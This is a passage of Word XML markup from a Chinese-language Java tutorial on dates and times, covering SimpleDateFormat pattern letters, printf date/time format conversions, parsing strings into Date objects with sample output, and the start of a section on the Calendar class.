            <w:tcW w:w="1812" w:type="dxa"/>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5C09F604"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毫秒数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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052FE454"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234</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="69C42DAC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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3DB64FFD"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E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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16277D92"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星期几</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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040909A8"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Tuesday</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="5849EF0D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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26190FCE"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D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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2A801007"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一年中的日子</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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0DF3AD3E"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360</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="19CBE326" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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2764A329"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F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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5AD422C6"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一个月中第几周的周几</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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1746FFB1"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2 (second Wed. in July)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="0D5F2088" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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3DD5E4F9"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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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51BDF8D3"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一年中第几周</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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7FFFA4B8"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="1A8FD278" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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156FB449"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W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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796414CE"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一个月中第几周</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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0F7F1D32"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="660F31ED" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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1A8A0E20"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a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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3D4CB4DF"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A.M./P.M. 标记</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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42C3A148"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PM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="6A55D925" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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6FFB4B14"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k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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167C3362"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一天中的小时(1~24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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35CBE67B"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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="0575CE17" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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7A783FD2"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K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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72356441"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 A.M./P.M. (0~11)格式小时</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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05541351"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="64F200FD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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136FFCA9"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z</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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4A3C8AA1"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时区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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0F9F14EA"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Eastern Standard Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="4202FF08" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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331CDBA7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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7523652A"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文字定界符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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69ECF1BE"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Delimiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="143CF6A1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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07FEBD29"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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52AB8CE9"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单引号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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1A499745"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01CE39B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F87B515" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.util.Date;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743ABD8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C868951" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class DateDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204E99CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026F4237" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014BEB4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     // </w:t>
      </w:r>
      <w:r>
        <w:t>初始化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Date </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588EF970" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Date date = new Date();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00040FF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E4DB4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     //c</w:t>
      </w:r>
      <w:r>
        <w:t>的使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE2D1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>System.out.printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>全部日期和时间信息：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>%tc%n",date);</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED5507C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //f</w:t>
      </w:r>
      <w:r>
        <w:t>的使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287D5933" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.printf("</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>日格式：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">%tF%n",date);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD3BD2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //d</w:t>
      </w:r>
      <w:r>
        <w:t>的使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350DB51A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.printf("</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>年格式：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">%tD%n",date);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E97831" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //r</w:t>
      </w:r>
      <w:r>
        <w:t>的使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB4D029" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.printf("HH:MM:SS PM</w:t>
      </w:r>
      <w:r>
        <w:t>格式（</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>时制）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">%tr%n",date);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA27EFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //t</w:t>
      </w:r>
      <w:r>
        <w:t>的使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EEEF21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    System.out.printf("HH:MM:SS</w:t>
      </w:r>
      <w:r>
        <w:t>格式（</w:t>
      </w:r>
      <w:r>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:t>时制）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">%tT%n",date);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44588D72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //R</w:t>
      </w:r>
      <w:r>
        <w:t>的使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14371AB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.printf("HH:MM</w:t>
      </w:r>
      <w:r>
        <w:t>格式（</w:t>
      </w:r>
      <w:r>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:t>时制）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">%tR",date);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2107CEB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439146B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752182B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析字符串为时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63760CF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">SimpleDateFormat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:t>有一些附加的方法，特别是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>parse()</w:t>
      </w:r>
      <w:r>
        <w:t>，它试图按照给定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SimpleDateFormat </w:t>
      </w:r>
      <w:r>
        <w:t>对象的格式化存储来解析字符串。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DCA71D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2603EAA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.text.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D46A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529C73E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class DateDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57170283" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C85221" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> SimpleDateFormat ft = new SimpleDateFormat ("yyyy-MM-dd"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28037D1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      String input = args.length == 0 ? "1818-11-11" : args[0]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3225E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      System.out.print(input + " Parses as "); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAA3469" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Date t; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A965D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      try { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B44D02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">t = ft.parse(input); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB1B25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          System.out.println(t); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4D36FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      } catch (ParseException e) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942FB2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          System.out.println("Unparseable using " + ft); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AAA577" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229AC84F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27033EC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428BA44B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>运行结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022AA8D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ java DateDemo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C008B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1818-11-11 Parses as Wed Nov 11 00:00:00 GMT 1818</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CDB66E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ java DateDemo 2007-12-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDC73F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2007-12-01 Parses as Sat Dec 01 00:00:00 GMT 2007</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5910E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="733" w:name="_Toc159780162"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Calendar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类：比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类强大的时间处理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="733"/>
    </w:p>
    <w:p w14:paraId="55E9A59C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:https://www.runoob.com/manual/jdk11api/java.base/java/util/Calendar.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F834702" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4802CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Calendar c = Calendar.getInstance(); // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认是当前日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A03BAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091E4773" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Calendar c1 = Calendar.getInstance();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个代表</w:t>
      </w:r>
      <w:r>
        <w:t>2009</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>日的</w:t>
      </w:r>
      <w:r>
        <w:t>Calendar</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A7B3F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>c1.set(2009, 6 - 1, 12);</w:t>
